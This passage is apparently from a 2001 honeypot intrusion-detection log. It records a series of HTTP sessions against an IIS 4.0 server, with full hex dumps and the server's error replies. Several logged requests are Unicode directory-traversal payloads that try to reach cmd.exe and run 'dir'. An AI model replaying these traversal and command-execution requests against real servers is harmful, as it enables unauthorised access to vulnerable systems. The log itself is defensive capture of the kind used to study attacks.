.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25529) [2001-09-18 10:21:36]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=34310 flags=0 offset=0 TTL=128 chksum=50068
TCP:  port=80 -> dport: 2735  flags=***A***F seq=495948
      ack=478857824 off=5 res=0 win=8588 urp=0 chksum=22997
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25530) [2001-09-18 10:21:36]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=13937 flags=0 offset=0 TTL=118 chksum=7466
TCP:  port=2735 -> dport: 80  flags=*****R** seq=478857824
      ack=0 off=5 res=0 win=0 urp=0 chksum=3266
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25531) [2001-09-18 10:21:36]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=14193 flags=0 offset=0 TTL=118 chksum=7206
TCP:  port=3967 -> dport: 80  flags=******S* seq=483647421
      ack=0 off=6 res=0 win=8192 urp=0 chksum=47761
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25532) [2001-09-18 10:21:36]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=35846 flags=0 offset=0 TTL=128 chksum=48528
TCP:  port=80 -> dport: 3967  flags=***A**S* seq=549229
      ack=483647422 off=6 res=0 win=8760 urp=0 chksum=22227
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25533) [2001-09-18 10:21:36]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=14449 flags=0 offset=0 TTL=118 chksum=23338
TCP:  port=2735 -> dport: 80  flags=*****R** seq=478857824
      ack=478857824 off=5 res=0 win=0 urp=0 chksum=9687
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25534) [2001-09-18 10:21:36]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=19057 flags=0 offset=0 TTL=119 chksum=2090
TCP:  port=3967 -> dport: 80  flags=***A**** seq=483647422
      ack=549230 off=5 res=0 win=8760 urp=0 chksum=28304
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25535) [2001-09-18 10:21:36]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=137 ID=19313 flags=0 offset=0 TTL=119 chksum=1737
TCP:  port=3967 -> dport: 80  flags=***AP*** seq=483647422
      ack=549230 off=5 res=0 win=8760 urp=0 chksum=5253
Payload:  length = 91

000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E   GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E   %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20   %5c../Admin.dll 
030 : 6E 2E 64 6C 6C 20 48 54 54 50 2F 31 2E 30 0D 0A   n.dll HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E   Host: www..Connn
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F                  ection: clo
----------------------------------------------------------------------------
--
#(2 - 25536) [2001-09-18 10:21:36]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=279 ID=36870 flags=0 offset=0 TTL=128 chksum=47269
TCP:  port=80 -> dport: 3967  flags=***AP*** seq=549230
      ack=483647519 off=5 res=0 win=8663 urp=0 chksum=13828
Payload:  length = 239

000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72   HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65   ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53   r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C   /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A    18 Sep 2001 16:
050 : 30 35 3A 31 37 20 47 4D 54 0D 0A 43 6F 6E 74 65   05:17 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74   nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67   ml..Content-Leng
080 : 74 68 3A 20 31 30 30 0D 0A 0D 0A 3C 68 74 6D 6C   th: 100....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 73 70 65 63   d><body>The
spec
0c0 : 69 66 69 65 64 20 6D 6F 64 75 6C 65 20 63 6F 75   ified module cou
0d0 : 6C 64 20 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E   ld not be found.
0e0 : 20 3C 2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
</body></html>
----------------------------------------------------------------------------
--
#(2 - 25537) [2001-09-18 10:21:36]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=37126 flags=0 offset=0 TTL=128 chksum=47252
TCP:  port=80 -> dport: 3967  flags=***A***F seq=549469
      ack=483647519 off=5 res=0 win=8663 urp=0 chksum=28064
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25538) [2001-09-18 10:21:36]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=24945 flags=0 offset=0 TTL=118 chksum=61993
TCP:  port=3967 -> dport: 80  flags=*****R** seq=483647519
      ack=0 off=5 res=0 win=0 urp=0 chksum=61929
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25539) [2001-09-18 10:21:36]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=25201 flags=0 offset=0 TTL=118 chksum=61733
TCP:  port=3978 -> dport: 80  flags=******S* seq=483647541
      ack=0 off=6 res=0 win=8192 urp=0 chksum=47630
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25540) [2001-09-18 10:21:36]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=37894 flags=0 offset=0 TTL=128 chksum=46480
TCP:  port=80 -> dport: 3978  flags=***A**S* seq=549530
      ack=483647542 off=6 res=0 win=8760 urp=0 chksum=21795
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25541) [2001-09-18 10:21:36]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=28017 flags=0 offset=0 TTL=118 chksum=9770
TCP:  port=3967 -> dport: 80  flags=*****R** seq=483647519
      ack=483647519 off=5 res=0 win=0 urp=0 chksum=62710
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25542) [2001-09-18 10:21:37]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=35953 flags=0 offset=0 TTL=119 chksum=50729
TCP:  port=3978 -> dport: 80  flags=***A**** seq=483647542
      ack=549531 off=5 res=0 win=8760 urp=0 chksum=27872
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25543) [2001-09-18 10:21:37]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=157 ID=36209 flags=0 offset=0 TTL=119 chksum=50356
TCP:  port=3978 -> dport: 80  flags=***AP*** seq=483647542
      ack=549531 off=5 res=0 win=8760 urp=0 chksum=28493
Payload:  length = 111

000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E   GET /_mem_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E   %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31   dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43   .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F      onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 25544) [2001-09-18 10:21:37]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=644 ID=38918 flags=0 offset=0 TTL=128 chksum=44856
TCP:  port=80 -> dport: 3978  flags=***AP*** seq=549531
      ack=483647659 off=5 res=0 win=8643 urp=0 chksum=8479
Payload:  length = 604

000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A   HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53   ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74   erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20   -IIS/4.0..Date: 
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31   Tue, 18 Sep 2001
050 : 20 31 36 3A 30 35 3A 31 37 20 47 4D 54 0D 0A 43    16:05:17 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34   ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65   61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C   : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74   e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D   le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65   e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D   META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38   l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F   HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C   g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65   <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68   r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74   e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20    you asked for. 
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65   Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74    URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20   hat the path is 
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63   <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61   t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20   dministrator if 
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72   this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25545) [2001-09-18 10:21:37]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=39174 flags=0 offset=0 TTL=128 chksum=45204
TCP:  port=80 -> dport: 3978  flags=***A***F seq=550135
      ack=483647659 off=5 res=0 win=8643 urp=0 chksum=27267
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25546) [2001-09-18 10:21:37]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=47985 flags=0 offset=0 TTL=118 chksum=38953
TCP:  port=3978 -> dport: 80  flags=*****R** seq=483647659
      ack=0 off=5 res=0 win=0 urp=0 chksum=61778
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25547) [2001-09-18 10:21:37]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=48241 flags=0 offset=0 TTL=118 chksum=38693
TCP:  port=4013 -> dport: 80  flags=******S* seq=483647897
      ack=0 off=6 res=0 win=8192 urp=0 chksum=47239
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25548) [2001-09-18 10:21:37]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=40198 flags=0 offset=0 TTL=128 chksum=44176
TCP:  port=80 -> dport: 4013  flags=***A**S* seq=550221
      ack=483647898 off=6 res=0 win=8760 urp=0 chksum=20713
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25549) [2001-09-18 10:21:37]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=48497 flags=0 offset=0 TTL=118 chksum=54825
TCP:  port=3978 -> dport: 80  flags=*****R** seq=483647659
      ack=483647659 off=5 res=0 win=0 urp=0 chksum=62419
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25550) [2001-09-18 10:21:38]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=4722 flags=0 offset=0 TTL=119 chksum=16425
TCP:  port=4013 -> dport: 80  flags=***A**** seq=483647898
      ack=550222 off=5 res=0 win=8760 urp=0 chksum=26790
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25551) [2001-09-18 10:21:38]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=185 ID=4978 flags=0 offset=0 TTL=119 chksum=16024
TCP:  port=4013 -> dport: 80  flags=***AP*** seq=483647898
      ack=550222 off=5 res=0 win=8760 urp=0 chksum=3789
Payload:  length = 127

000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63   GET /msadc/..%5c
010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63   ../..%5c../..%5c
020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E   /..55../..c1../.
030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   ./.../winnt/syst
040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   dir 32/cmd.exe?/
060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   c+dir HTTP/1.0..
070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E      Host: www..Conn
----------------------------------------------------------------------------
--
#(2 - 25552) [2001-09-18 10:21:38]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=305 ID=41734 flags=0 offset=0 TTL=128 chksum=42379
TCP:  port=80 -> dport: 4013  flags=***AP*** seq=550222
      ack=483648043 off=5 res=0 win=8615 urp=0 chksum=48807
Payload:  length = 265

000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72   HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65   ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53   r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C   /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A    18 Sep 2001 16:
050 : 30 35 3A 31 38 20 47 4D 54 0D 0A 43 6F 6E 74 65   05:18 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74   nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67   ml..Content-Leng
080 : 74 68 3A 20 31 32 36 0D 0A 0D 0A 3C 68 74 6D 6C   th: 126....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 66 69 6C 65   d><body>The
file
0c0 : 6E 61 6D 65 2C 20 64 69 72 65 63 74 6F 72 79 20   name, directory 
0d0 : 6E 61 6D 65 2C 20 6F 72 20 76 6F 6C 75 6D 65 20   name, or volume 
0e0 : 6C 61 62 65 6C 20 73 79 6E 74 61 78 20 69 73 20   label syntax is 
0f0 : 69 6E 63 6F 72 72 65 63 74 2E 20 3C 2F 62 6F 64   incorrect. </bod
100 : 79 3E 3C 2F 68 74 6D 6C 3E                        y></html>
----------------------------------------------------------------------------
--
#(2 - 25553) [2001-09-18 10:21:38]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=41990 flags=0 offset=0 TTL=128 chksum=42388
TCP:  port=80 -> dport: 4013  flags=***A***F seq=550487
      ack=483648043 off=5 res=0 win=8615 urp=0 chksum=26524
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25554) [2001-09-18 10:21:38]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=61298 flags=0 offset=0 TTL=118 chksum=25640
TCP:  port=4013 -> dport: 80  flags=*****R** seq=483648043
      ack=2869794125 off=5 res=0 win=0 urp=0 chksum=44884
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25555) [2001-09-18 10:21:38]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=61554 flags=0 offset=0 TTL=118 chksum=25380
TCP:  port=4030 -> dport: 80  flags=******S* seq=483648049
      ack=0 off=6 res=0 win=8192 urp=0 chksum=47070
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25556) [2001-09-18 10:21:38]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=43270 flags=0 offset=0 TTL=128 chksum=41104
TCP:  port=80 -> dport: 4030  flags=***A**S* seq=551192
      ack=483648050 off=6 res=0 win=8760 urp=0 chksum=19573
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25557) [2001-09-18 10:21:38]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=61810 flags=0 offset=0 TTL=118 chksum=41512
TCP:  port=4013 -> dport: 80  flags=*****R** seq=483648043
      ack=483648043 off=5 res=0 win=0 urp=0 chksum=61616
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25558) [2001-09-18 10:21:38]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=7795 flags=0 offset=0 TTL=119 chksum=13352
TCP:  port=4030 -> dport: 80  flags=***A**** seq=483648050
      ack=551193 off=5 res=0 win=8760 urp=0 chksum=25650
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25559) [2001-09-18 10:21:38]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=137 ID=8051 flags=0 offset=0 TTL=119 chksum=12999
TCP:  port=4030 -> dport: 80  flags=***AP*** seq=483648050
      ack=551193 off=5 res=0 win=8760 urp=0 chksum=42860
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 25560) [2001-09-18 10:21:38]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=305 ID=44550 flags=0 offset=0 TTL=128 chksum=39563
TCP:  port=80 -> dport: 4030  flags=***AP*** seq=551193
      ack=483648147 off=5 res=0 win=8663 urp=0 chksum=47411
Payload:  length = 265

000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72   HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65   ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53   r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C   /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A    18 Sep 2001 16:
050 : 30 35 3A 31 39 20 47 4D 54 0D 0A 43 6F 6E 74 65   05:19 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74   nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67   ml..Content-Leng
080 : 74 68 3A 20 31 32 36 0D 0A 0D 0A 3C 68 74 6D 6C   th: 126....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 66 69 6C 65   d><body>The
file
0c0 : 6E 61 6D 65 2C 20 64 69 72 65 63 74 6F 72 79 20   name, directory 
0d0 : 6E 61 6D 65 2C 20 6F 72 20 76 6F 6C 75 6D 65 20   name, or volume 
0e0 : 6C 61 62 65 6C 20 73 79 6E 74 61 78 20 69 73 20   label syntax is 
0f0 : 69 6E 63 6F 72 72 65 63 74 2E 20 3C 2F 62 6F 64   incorrect. </bod
100 : 79 3E 3C 2F 68 74 6D 6C 3E                        y></html>
----------------------------------------------------------------------------
--
#(2 - 25561) [2001-09-18 10:21:38]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=44806 flags=0 offset=0 TTL=128 chksum=39572
TCP:  port=80 -> dport: 4030  flags=***A***F seq=551458
      ack=483648147 off=5 res=0 win=8663 urp=0 chksum=25384
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25562) [2001-09-18 10:21:39]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=17523 flags=0 offset=0 TTL=118 chksum=3880
TCP:  port=4030 -> dport: 80  flags=*****R** seq=483648147
      ack=0 off=5 res=0 win=0 urp=0 chksum=61238
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25563) [2001-09-18 10:21:39]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=17779 flags=0 offset=0 TTL=118 chksum=3620
TCP:  port=4070 -> dport: 80  flags=******S* seq=483904361
      ack=0 off=6 res=0 win=8192 urp=0 chksum=52858
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25564) [2001-09-18 10:21:39]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=45574 flags=0 offset=0 TTL=128 chksum=38800
TCP:  port=80 -> dport: 4070  flags=***A**S* seq=551823
      ack=483904362 off=6 res=0 win=8760 urp=0 chksum=24730
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25565) [2001-09-18 10:21:39]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=18035 flags=0 offset=0 TTL=118 chksum=19752
TCP:  port=4030 -> dport: 80  flags=*****R** seq=483648147
      ack=483648147 off=5 res=0 win=0 urp=0 chksum=61391
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25566) [2001-09-18 10:21:39]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=30067 flags=0 offset=0 TTL=119 chksum=56615
TCP:  port=4070 -> dport: 80  flags=***A**** seq=483904362
      ack=551824 off=5 res=0 win=8760 urp=0 chksum=30807
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25567) [2001-09-18 10:21:39]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=137 ID=30323 flags=0 offset=0 TTL=119 chksum=56262
TCP:  port=4070 -> dport: 80  flags=***AP*** seq=483904362
      ack=551824 off=5 res=0 win=8760 urp=0 chksum=47249
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 25568) [2001-09-18 10:21:39]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=644 ID=46854 flags=0 offset=0 TTL=128 chksum=36920
TCP:  port=80 -> dport: 4070  flags=***AP*** seq=551824
      ack=483904459 off=5 res=0 win=8663 urp=0 chksum=13205
Payload:  length = 604

000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A   HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53   ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74   erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20   -IIS/4.0..Date: 
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31   Tue, 18 Sep 2001
